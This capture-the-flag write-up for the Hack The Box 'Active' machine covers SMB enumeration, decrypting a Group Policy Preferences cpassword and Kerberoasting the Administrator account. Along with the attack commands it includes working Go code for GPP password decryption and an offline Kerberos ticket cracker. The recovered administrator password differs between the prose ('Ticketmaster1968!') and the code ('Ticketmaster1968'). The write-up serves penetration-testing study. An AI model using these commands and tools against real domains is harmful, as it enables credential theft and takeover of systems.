Hack The Box / Active
Active is our fourth machine in the OSCP list provided by NetSec Focus! This machine was a great learning experience: SMB enumeration and some knowledge of Kerberos were essential in order to root it. This is the fourth blog post before my third attempt at the OSCP exam, so let's get to it!
Information Gathering
Nmap Scan
So, we start with an nmap scan to check which ports are open and what services are running on this machine.
nmap -sC -sV -p- -oN scan.nmap 10.10.10.100
Do not panic! That looks like a lot of enumeration to do, and it is, but keep in mind the important services in this nmap scan, which for this machine are SMB, Kerberos and HTTP. After some discovery and extensive enumeration, the services that give a straight path to root are SMB and Kerberos.
SMB Enumeration
There are different tools for SMB enumeration, such as enum4linux and the nmap SMB scripts, but my preference is smbmap due to its accurate results.
smbmap -H 10.10.10.100
Where -H specifies the host to scan.
Looking at the results given by smbmap, the only share we can access anonymously is Replication. To access Replication we need smbclient; as the login is anonymous, no password is required (just press Enter at the password prompt).
smbclient //10.10.10.100/Replication
Once logged in to the share there are many folders and files to look through, but the directory that actually gave good results was \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\, which contains an XML file (Groups.xml) with interesting information: a Group Policy Preferences entry that configures an account, password included.
Once we have the file on our local host we can read it. It contains an attribute called cpassword, which holds the password encrypted with the Group Policy Preferences (GPP) scheme. That scheme is AES-256 with a key Microsoft published in its own documentation, so the value can be decrypted by anyone using the gpp-decrypt tool that comes installed in Kali Linux. This is the command to decrypt the password.
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
After executing the command we get the password GPPstillStandingStrong2k18. But what about the user? The same XML file clearly shows that the username is SVC_TGS, so we can use this username and password to access SMB again, this time not anonymously but as an authenticated domain user.
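What gpp-decrypt actually does deserves a closer look, because it explains why no secret was needed: the cpassword value is AES-256-CBC ciphertext, but the key is the one Microsoft published in the MS-GPPREF specification, so anyone who can read the share can recover the password. The following Go program is an added example written for this post (it is not the gpp-decrypt code nor anything taken from the machine) that decrypts a cpassword the same way and pulls the username and password pairs out of a Groups.xml. The Groups.xml it parses is a constructed sample reduced to the attributes used, carrying the cpassword and account name quoted above; the element and attribute names are the standard GPP ones.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/xml"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// The AES-256 key Microsoft published in MS-GPPREF for Group Policy Preferences passwords.
// Every domain uses this one key, which is why a cpassword is plaintext-equivalent.
var gppKey = []byte{
	0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10, 0x62, 0x0f, 0xfe, 0xe8,
	0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90, 0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b,
}

// DecryptCpassword does what gpp-decrypt does: restore the base64 padding GPP strips,
// AES-256-CBC with an all-zero IV, remove the PKCS#7 padding, decode the UTF-16LE string.
func DecryptCpassword(cpassword string) (string, error) {
	s := strings.TrimRight(cpassword, "=")
	if m := len(s) % 4; m != 0 {
		s += strings.Repeat("=", 4-m)
	}
	ct, err := base64.StdEncoding.DecodeString(s)
	if err != nil { return "", err }
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext length %d is not a multiple of %d", len(ct), aes.BlockSize)
	}
	block, err := aes.NewCipher(gppKey)
	if err != nil { return "", err }
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize { return "", errors.New("bad PKCS#7 padding") }
	for _, b := range pt[len(pt)-pad:] {
		if int(b) != pad {
			return "", errors.New("bad PKCS#7 padding")
		}
	}
	pt = pt[:len(pt)-pad]
	if len(pt)%2 != 0 { return "", errors.New("plaintext is not UTF-16LE") }
	u := make([]uint16, len(pt)/2)
	for i := range u {
		u[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// Groups.xml has one <User> element per local-account preference; the credentials are
// attributes of its <Properties> child. Only the attributes needed here are mapped.
type groupsXML struct {
	Users []struct {
		Name       string `xml:"name,attr"`
		Properties struct {
			UserName  string `xml:"userName,attr"`
			Cpassword string `xml:"cpassword,attr"`
		} `xml:"Properties"`
	} `xml:"User"`
}

type Cred struct{ User, Password string }

// ExtractCreds decrypts every cpassword in a Groups.xml document.
func ExtractCreds(doc string) ([]Cred, error) {
	var g groupsXML
	if err := xml.Unmarshal([]byte(doc), &g); err != nil {
		return nil, err
	}
	var creds []Cred
	for _, u := range g.Users {
		if u.Properties.Cpassword == "" {
			continue // a preference that does not set a password
		}
		pw, err := DecryptCpassword(u.Properties.Cpassword)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", u.Name, err)
		}
		creds = append(creds, Cred{u.Properties.UserName, pw})
	}
	return creds, nil
}

// Constructed sample modelled on the Groups.xml in the Replication share: the cpassword and
// account name are the values quoted in the post; other attributes are reduced to the ones used.
const sampleGroupsXML = `<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>`

func main() {
	creds, err := ExtractCreds(sampleGroupsXML)
	fmt.Println(creds, err) // [{active.htb\SVC_TGS GPPstillStandingStrong2k18}] <nil>
}
```

Run it with go run and it prints the SVC_TGS credentials. DecryptCpassword rejects ciphertext that is not a whole number of AES blocks or that has bad PKCS#7 padding, which is what you get when a cpassword was truncated by copy-paste; that check is worth keeping, since a silently wrong password costs a lot of time at the next smbclient prompt.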
smbclient //10.10.10.100/Users -U SVC_TGS
User Flag
After logging in, the user flag is located in \SVC_TGS\Desktop; we can transfer it to our local host and read it!
Voilà! We got user.
Getting Root
Doing this on my own was complicated due to my lack of knowledge about Kerberos enumeration, so I have to thank 0xRick for his explanation about Kerberoasting. Before attempting this, add 10.10.10.100 to your /etc/hosts file as active.htb so that the attack runs successfully: the impacket tools need to resolve the domain name.
Get User SPNs
There is a good tool in the impacket toolset called GetUserSPNs.py. Using the credentials of any domain user (here SVC_TGS; the tool prompts for the password), it asks the domain controller which accounts have a Service Principal Name (SPN) set and requests a service ticket (TGS) for each of them. On this machine the Administrator account has an SPN, so we get back a ticket encrypted with the Administrator's password hash, which can be cracked offline. This is what Kerberoasting is.
./GetUserSPNs.py -request active.htb/SVC_TGS
And we have a hash! It’s time to use John to crack this hash.
Cracking The Hash with John
After saving the hash to a file (I named it admin), we can use john with a wordlist to crack the hash and obtain the password with the following command.
john -w=/usr/share/wordlists/rockyou.txt admin
Where -w= specifies the wordlist to use to crack the password (rockyou.txt here).
And our Administrator password is: Ticketmaster1968!
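The "hash" that GetUserSPNs.py prints is really the encrypted part of the service ticket, and it is crackable offline for one reason: with RC4-HMAC (etype 23, the type the tool requests) every key involved is derived from the service account's NT hash, which is just MD4 of the UTF-16LE password. The Go program below is an added example written for this post, not code from impacket, john or the box, that does the offline half of Kerberoasting: it parses a $krb5tgs$23$ line and, for each wordlist candidate, derives K1 and K3 as in RFC 4757, decrypts the ticket with RC4 and checks the HMAC-MD5 checksum the ticket carries. The ticket it cracks is constructed locally under the password the post recovers (fixed confounder, made-up ticket body), and the SPN active/CIFS:445 in it is an assumed placeholder; the real ticket from Active is not reproduced. MD4 is written out because Go's standard library does not include it.

```go
package main

import (
	"crypto/hmac"
	"crypto/md5"
	"crypto/rc4"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"strings"
	"unicode/utf16"
)

// md4 implements RFC 1320 (not in Go's standard library). The NT hash that keys an account's
// RC4-HMAC Kerberos tickets is MD4 over the UTF-16LE password.
func md4(data []byte) []byte {
	msg := append(append([]byte{}, data...), 0x80)
	for len(msg)%64 != 56 { msg = append(msg, 0) }
	msg = append(msg, make([]byte, 8)...)
	binary.LittleEndian.PutUint64(msg[len(msg)-8:], uint64(len(data))*8) // bit length, little-endian
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	rot := func(x uint32, s uint) uint32 { return x<<s | x>>(32-s) }
	r3 := [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}
	s1, s2, s3 := [4]uint{3, 7, 11, 19}, [4]uint{3, 5, 9, 13}, [4]uint{3, 9, 11, 15}
	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x { x[i] = binary.LittleEndian.Uint32(msg[off+4*i:]) }
		aa, bb, cc, dd := a, b, c, d
		for i := 0; i < 16; i++ { // round 1: F = (B and C) or (not B and D), words in order
			a, d, c, b = d, c, b, rot(a+((b&c)|(^b&d))+x[i], s1[i%4])
		}
		for i := 0; i < 16; i++ { // round 2: G = majority(B, C, D), words 0,4,8,12,1,5,9,...
			a, d, c, b = d, c, b, rot(a+((b&c)|(b&d)|(c&d))+x[(i%4)*4+i/4]+0x5a827999, s2[i%4])
		}
		for i := 0; i < 16; i++ { // round 3: H = B xor C xor D, words in r3 order
			a, d, c, b = d, c, b, rot(a+(b^c^d)+x[r3[i]]+0x6ed9eba1, s3[i%4])
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	out := make([]byte, 16)
	for i, v := range []uint32{a, b, c, d} { binary.LittleEndian.PutUint32(out[4*i:], v) }
	return out
}

func ntHash(password string) []byte {
	u := utf16.Encode([]rune(password))
	buf := make([]byte, 2*len(u))
	for i, v := range u { binary.LittleEndian.PutUint16(buf[2*i:], v) }
	return md4(buf)
}

func hmacMD5(key, data []byte) []byte { m := hmac.New(md5.New, key); m.Write(data); return m.Sum(nil) }

// RFC 4757 with T = key usage 2 (TGS-REP ticket enc-part) as 4-byte little-endian:
// K1 = HMAC-MD5(NT hash, T); checksum = HMAC-MD5(K1, confounder||data);
// K3 = HMAC-MD5(K1, checksum); edata = RC4(K3, confounder||data); ticket = checksum||edata.
var usageTicket = []byte{2, 0, 0, 0}

// tryPassword is the offline per-candidate check: K1 from the guess, K3 from the ticket's own
// checksum, decrypt, then verify the checksum over the result. The DC is never contacted.
func tryPassword(password string, checksum, edata []byte) bool {
	k1 := hmacMD5(ntHash(password), usageTicket)
	c, _ := rc4.NewCipher(hmacMD5(k1, checksum)) // 16-byte key, NewCipher cannot fail
	plain := make([]byte, len(edata))
	c.XORKeyStream(plain, edata)
	return hmac.Equal(hmacMD5(k1, plain), checksum)
}

// Crack parses a $krb5tgs$23$*user$REALM$spn*$checksum$edata line (what GetUserSPNs.py writes
// and john/hashcat mode 13100 read) and tries every wordlist entry against it.
func Crack(line string, wordlist []string) (string, bool) {
	p := strings.Split(line, "$")
	if len(p) != 8 || p[1] != "krb5tgs" || p[2] != "23" { return "", false }
	checksum, err1 := hex.DecodeString(p[6])
	edata, err2 := hex.DecodeString(p[7])
	if err1 != nil || err2 != nil || len(checksum) != md5.Size { return "", false }
	for _, w := range wordlist {
		if tryPassword(w, checksum, edata) { return w, true }
	}
	return "", false
}

// sampleTicket is constructed, not the ticket from the box: a fixed confounder, a made-up ticket
// body and an assumed SPN, encrypted as in RFC 4757 under the password the post recovers.
func sampleTicket() string {
	k1 := hmacMD5(ntHash("Ticketmaster1968"), usageTicket)
	plain := []byte("confndr!constructed-ticket-enc-part") // 8-byte confounder, then the body
	checksum := hmacMD5(k1, plain)
	c, _ := rc4.NewCipher(hmacMD5(k1, checksum))
	edata := make([]byte, len(plain))
	c.XORKeyStream(edata, plain)
	return fmt.Sprintf("$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS:445*$%x$%x", checksum, edata)
}

func main() {
	line := sampleTicket()
	fmt.Println(line)
	fmt.Println(Crack(line, []string{"password", "Welcome1", "Ticketmaster1968"}))
}
```

go run prints the constructed line and then Ticketmaster1968 true. The derivation is the same one john's krb5tgs format and hashcat mode 13100 run at scale, and it shows the defender-side point: any domain user can request these tickets, so the only protection for an account with an SPN is its password strength, which is why long random passwords or group managed service accounts are recommended for such accounts.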
Using psexec to Get The Root Flag.
impacket has another amazing tool called psexec.py: given the Administrator password, it connects to the machine over SMB, installs a temporary service and gives us a command prompt running as NT AUTHORITY\SYSTEM, which is all we need to read the root flag.
python3 psexec.py administrator@active.htb
And we got the root flag!
To conclude
Enumerating the important services is a good technique to avoid rabbit holes. I also learned that SMB can be useful for getting files and information from the victim machine, and that impacket has a good set of networking tools whose usage will be beneficial when doing penetration testing.